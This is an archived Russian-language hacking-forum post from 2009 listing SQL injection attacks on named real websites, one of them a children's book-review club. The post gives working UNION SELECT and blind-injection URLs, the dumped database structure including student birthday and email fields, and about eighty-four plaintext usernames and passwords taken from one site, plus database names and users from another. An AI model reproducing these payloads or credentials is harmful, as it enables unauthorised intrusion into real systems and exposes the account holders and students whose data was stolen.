HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 05.06.2009, 00:15
AlexSatter
Постоянный
Регистрация: 29.01.2009
Сообщений: 333
Провел на форуме:
1168802

Репутация: 298
По умолчанию

http://www.spaghettibookclub.org/student.php?student_id=-5151+union+select+1,2,3,4,version(),6,7,8,9,10,11, 12,13,14,15
5.0.77-community-log
Pr 5

структура БД
Код:
Database [spaghett_bookclub]
    Table [spb_access_type  ( Rows)]
        access_type_id
        name
    Table [spb_account_type  ( Rows)]
        account_type_id
        name
    Table [spb_author  ( Rows)]
        author_id
        last_name
        first_name
    Table [spb_book  ( Rows)]
        book_id
        title
        alpha_title
        author_id
        illustrator
        publisher
        pages
    Table [spb_book_genre_xref  ( Rows)]
        book_genre_id
        book_id
        genre_id
    Table [spb_book_theme_xref  ( Rows)]
        book_theme_id
        book_id
        theme_id
    Table [spb_class  ( Rows)]
        class_id
        clubhouse_active
        school_id
        school_year
        name
        color_schema_id
        teacher_lname
        teacher_fname
        teacher_hon
        teach_name
        status
        grade_level
        grade_level2
        signup_date
        expire_date
        completion_status
        prog_desc
        paid_for_reviews
        payment_recieved
        payment_note
        sponsor
        new
        alt_grade_desc
        direct_image_upload
        sponsor_image_id
        class_size
        teach_title
        teach_phone
    Table [spb_class_access  ( Rows)]
        class_access_id
        class_id
        access_type_id
    Table [spb_color_schema  ( Rows)]
        schema_id
        name
        bg_color
        text_color
    Table [spb_genre  ( Rows)]
        genre_id
        name
    Table [spb_image  ( Rows)]
        image_id
        extension
        name
    Table [spb_image_assoc  ( Rows)]
        assoc_id
        image_id
        critic_id
        group_id
    Table [spb_member  ( Rows)]
        member_id
        critic_id
        group_id
        grade
        image_id
    Table [spb_member_review_xref  ( Rows)]
        member_review_id
        review_id
        member_id
        screen_name
        age
        city
        state
    Table [spb_multigroup  ( Rows)]
        multi_id
        student_id1
        student_id2
    Table [spb_publisher  ( Rows)]
        publisher_id
        name
    Table [spb_review  ( Rows)]
        review_id
        class_id
        book_id
        image_id
        status
        creation_date
        editable
        review_text
        grade1
        grade2
    Table [spb_review_revision_xref  ( Rows)]
        review_id
        revision_id
    Table [spb_revision  ( Rows)]
        revision_id
        revision
    Table [spb_school  ( Rows)]
        school_id
        group_type_id
        url
        name
        address1
        address2
        city
        state
        zipcode
        district
        phone
        principal
        color_schema_id
        status
        image_id
        note
        new
        country
        sponsor
        sponsor_image_id
    Table [spb_session  ( Rows)]
        session_id
        code
        user_id
        last_access
    Table [spb_student  ( Rows)]
        student_id
        class_id
        first_name
        last_name
        screen_name
        birthday
        email
        color_schema_id
        portrait_id
        gender
        consent
        city
        state
        grade
    Table [spb_student_restore  ( Rows)]
        student_id
        class_id
        first_name
        last_name
        screen_name
        birthday
        email
        color_schema_id
        portrait_id
        gender
        consent
    Table [spb_student_review_xref  ( Rows)]
        student_review_id
        student_id
        review_id
    Table [spb_theme  ( Rows)]
        theme_id
        name
    Table [spb_user  ( Rows)]
        user_id
        username
        password
        last_name
        first_name
        honorific
        email
        account_type_id
        sub_type_id
        status
        classroom_id
        school_id
        group_id
        individual_id
        family_id
    Table [state  ( Rows)]
        abbr
        name
юзеры и пассворды:
Код:
[0]:1:julie:topaz
[1]:2:mattison:cunnilingus
[2]:736:tamrunr:tamrunr
[3]:4:staff person:staff
[4]:829:dsalewski:prejs
[5]:7:julieann:teacher
[6]:801:bmiles:olive79
[7]:719:elsevier:recares
[8]:865:sundaytest:sundaytest
[9]:826:smorlan:stobildn
[10]:916:cruzm01:cruzm01
[11]:22:school1:school2
[12]:892:Dione:johnmayer
[13]:738:juliesddff:jluiesdf
[14]:1036:mtest:cunnilingus
[15]:1001:dogs:drool
[16]:873:aflores:lolita67
[17]:35:tlc:marcya1
[18]:36:school:school
[19]:922:jesslura:jesslura1
[20]:38:armory:summer
[21]:517::
[22]:40:jr:afterschool
[23]:41:mike:pickering
[24]:523::
[25]:860:test:test
[26]:867:est51er:jeanne
[27]:902:bsandford:brooks
[28]:942:suneedai:psalm233
[29]:64:rosemarin:ann
[30]:869:dude:dude
[31]:594:murray:murray
[32]:929:mpgrantham:mpgrantham
[33]:841:edwardscl:Benson
[34]:912:skpatters:k50k50
[35]:640:nycares:spring09
[36]:906:may9july:1294
[37]:911:ubarrera:fall
[38]:828:lgteach:dozie1
[39]:878:lonkhan:shanda35
[40]:817:nycares1:spring1
[41]:930:henzdawn:dhphdh
[42]:835:wildwoodms:warriors
[43]:522::
[44]:807:metropt2:4467
[45]:737:dleipsic:dleipsic
[46]:734:kprice:touchstone
[47]:924:maddog:maddog6
[48]:910:kellkamm:red2468
[49]:568::
[50]:904:pettitt:pettitt
[51]:834:weaver:#48winner
[52]:856:asdfXX:asdfXX
[53]:920:benji:ell2
[54]:880:mitchell:mitchell5
[55]:862:rakina81:tiakari
[56]:395:bethjnj:ethel
[57]:866:pams:2123
[58]:382::
[59]:381::
[60]:380::
[61]:135:ClassGuest:password
[62]:845:lkoertzen:owenmeany
[63]:861:jenmatsuno:jen725
[64]:836:nighthawk:common
[65]:891:thomasb16:honeybee
[66]:844:metrobapt:4464
[67]:852:ksalmon:blue21
[68]:851:jclaessens:gojillgo
[69]:859:forgetme:forgetme
[70]:918:sinman:keeley00
[71]:883:mpierce:beach
[72]:864:tstafford:tomboy
[73]:452:Barb:amberK
[74]:914:dawnblad:45744
[75]:888:wwinchel:magoo
[76]:839:avaldez:hulkster
[77]:379::
[78]:884:weitzmac:hannah
[79]:712:MrsSerna:saja
[80]:561::
[81]:877:stagrade1:firstgrade
[82]:895:juliefour:Elliottr4
[83]:838:Suzwoo:stwenc76
http://digitalmedia.massey.ac.nz/exposure/student.php?id=6+and+substring(version(),1,1)=5

PR 5

http://www.impacttest.com/doctor.php?id=-2911+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7 873716C696E6A626567696E,Version(),0x2F2A2A2F,Datab ase(),0x2F2A2A2F,User(),0x7873716C696E6A656E64),0x 71),0x71),21,22,23,24,25,26,27,28,29,30,31,32,33,3 4,35,36,37,38,39,40,41,42,43,44/*

Database Version: 4.1.22-standard
Database name: impact_impacttest
User name: impact_impact@localhost


нашел таблицу users. поле username подобрал, где хранится пароль.. нет. юзеры:
mawheatley
test
impact
workshops

Последний раз редактировалось AlexSatter; 05.06.2009 в 01:09..
 
Ответить с цитированием
 





Здесь присутствуют: 3 (пользователей: 0 , гостей: 3)
 


Быстрый переход




ANTICHAT.XYZ